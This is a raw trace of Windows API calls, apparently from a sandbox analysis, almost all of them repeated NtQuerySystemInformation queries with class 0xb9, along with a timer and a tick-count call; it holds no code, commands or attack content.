NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x28, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0272.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0272.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0272.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.280] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce80 | out: lpSystemTimeAsFileTime=0xf7a68fce80*(dwLowDateTime=0x34a894f0, dwHighDateTime=0x1d63874)) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0272.280] GetTickCount () returned 0x118439e [0272.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0272.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x28, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0272.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0272.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0272.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0272.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.323] 